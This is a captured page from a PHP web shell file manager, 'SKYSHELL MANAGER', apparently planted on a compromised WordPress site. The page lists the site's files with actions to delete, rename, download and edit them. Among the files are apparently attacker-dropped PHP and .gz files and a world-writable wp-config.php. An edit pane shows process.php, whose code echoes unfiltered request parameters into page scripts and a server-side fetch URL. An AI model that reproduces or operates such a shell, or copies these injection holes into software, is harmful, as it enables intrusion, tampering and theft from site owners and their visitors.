📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
surefundeals
/
Name
Size
Perm
Actions
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0555
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.51 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
222.php
15.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
32.33 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
0.4 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
license.txt
19.44 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
readme.html
7.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
7.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-blog-header.php
0.34 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-comments-post.php
2.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config-sample.php
3.26 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config.php
3.54 KB
0666
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
5.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-links-opml.php
2.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-load.php
3.84 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-login.php
50.66 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
8.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-scanner.gz
21.5 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-scanner.php
0.15 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-settings.php
31.88 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-signup.php
33.94 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-trackback.php
5.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-ugebuild.gz
47.66 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-ugebuild.php
0.16 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
xmlrpc.php
3.13 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
yyj.txt
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: process.php
<?php define('INCLUDE_CHECK',true); include_once 'connect.php'; $pflag=$_REQUEST['pflag']; $eid=$_REQUEST['eid']; $uflag=$_REQUEST['uflag']; if($pflag==1) { $title="My Job Details"; }else{ $title="Each One Of The Job Details"; } ?> <html> <head> <!-- Bootstrap --> <link rel="stylesheet" href="css/bootstrap.min1.css"> <!-- Bootstrap responsive --> <link rel="stylesheet" href="css/bootstrap-responsive.min.css"> <!-- jQuery UI --> <link rel="stylesheet" href="css/plugins/jquery-ui/smoothness/jquery-ui.css"> <link rel="stylesheet" href="css/plugins/jquery-ui/smoothness/jquery.ui.theme.css"> <!-- Theme CSS --> <link rel="stylesheet" href="css/style.css"> <!-- Color CSS --> <link rel="stylesheet" href="css/themes.css"> <!-- jQuery --> <script src="js/jquery.min.js"></script> <script src="js/plugins/datatable1/js/jquery.dataTables.js"></script> <!-- jQuery UI --> <script src="js/plugins/jquery-ui/jquery.ui.core.min.js"></script> <script src="js/plugins/jquery-ui/jquery.ui.widget.min.js"></script> <script src="js/plugins/jquery-ui/jquery.ui.mouse.min.js"></script> <script src="js/plugins/jquery-ui/jquery.ui.draggable.min.js"></script> <script src="js/plugins/jquery-ui/jquery.ui.resizable.min.js"></script> <script src="js/plugins/jquery-ui/jquery.ui.sortable.min.js"></script> <!-- Bootstrap --> <script src="js/bootstrap.min.js"></script> <!--[if lte IE 9]> <script src="js/plugins/placeholder/jquery.placeholder.min.js"></script> <script> $(document).ready(function() { $('input, textarea').placeholder(); }); </script> <![endif]--> <style type="text/css"> #pageloaddiv { position: fixed;left: 0px;top: 0px;width: 90%;height: 100%;z-index: 1000;background: url('<?php echo $loading_img_url;?>') no-repeat center center;border:1px solid 1px; } #main{<div id="" class=""> </div> margin-left:150px; overflow: visable; padding-bottom: 30px } body { background: #e3dedb !important; width: 92%;} /* Adding !important forces the browser to overwrite the default style applied by Bootstrap */ </style> </head> <body > <!-- <div id="pageloaddiv"></div> --> <!-- <div id="main"></div> --> <div id='page_content'> <div class="row-fluid"> <div> <div class="box box-color box-bordered"> <div class="box-title"> <h3> <i class="icon-table"></i> <?php echo $title;?> </h3> <h3 style="margin-left:35px;"> <span style="color:white;display:none;" id="process_update_resp">Process Updated Successfully..</span> </h3> <div class="actions"> <strong> <font color='white'><h3>Interval days : </h3></font></strong> <select id='interval_days' style='width:50px;height:24px;margin-top:5px;' title='Click to Change Interval days'> <?php for($day=1; $day < 16; $day++) { echo "<option value='$day'>$day</option>"; } ?> </select> <a class="btn btn-mini content-refresh" href="#" onclick="refreshProcess();" title='Click to Refresh the Process'> <i class="icon-refresh"></i> </a> </div> </div> <div class="box-content nopadding"> <span id='process_content_resp'> <?php echo file_get_contents("$local_server/process_content.php?eid=$eid&pflag=$pflag"); ?> </span> </div> </div> </div> </div> </div> </body> </html> <script type='text/javascript'> var shpath='<?php echo "$local_server/";?>'; var eid='<?php echo "$eid";?>'; var pflag='<?php echo "$pflag";?>'; var loading_img_url='<?php echo $loading_img_url; ?>'; var uflag='<?php echo $uflag; ?>'; if(uflag==1){ $("#process_update_resp").show(); }else{ $("#process_update_resp").hide(); } $(document).ready(function () { $(window).load(function() { $("#pageloaddiv").fadeOut(2000); $("#page_content").fadeIn(2000); }); $('#interval_days').change(function() { $('#process_content_resp').html("<img src='"+loading_img_url+"'>"); $.post('process_content.php', { eid: eid , days:$(this).val(),pflag:pflag },function(data) { $('#process_content_resp').html(data); } ); }); }); function refreshProcess() { var days=$("#interval_days option:selected").val(); $('#process_content_resp').html("<img src='"+loading_img_url+"'>"); $.post("process_content.php", { eid: eid , pflag:pflag,days:days },function(data) { $('#process_content_resp').html(data); }); } </script>
Save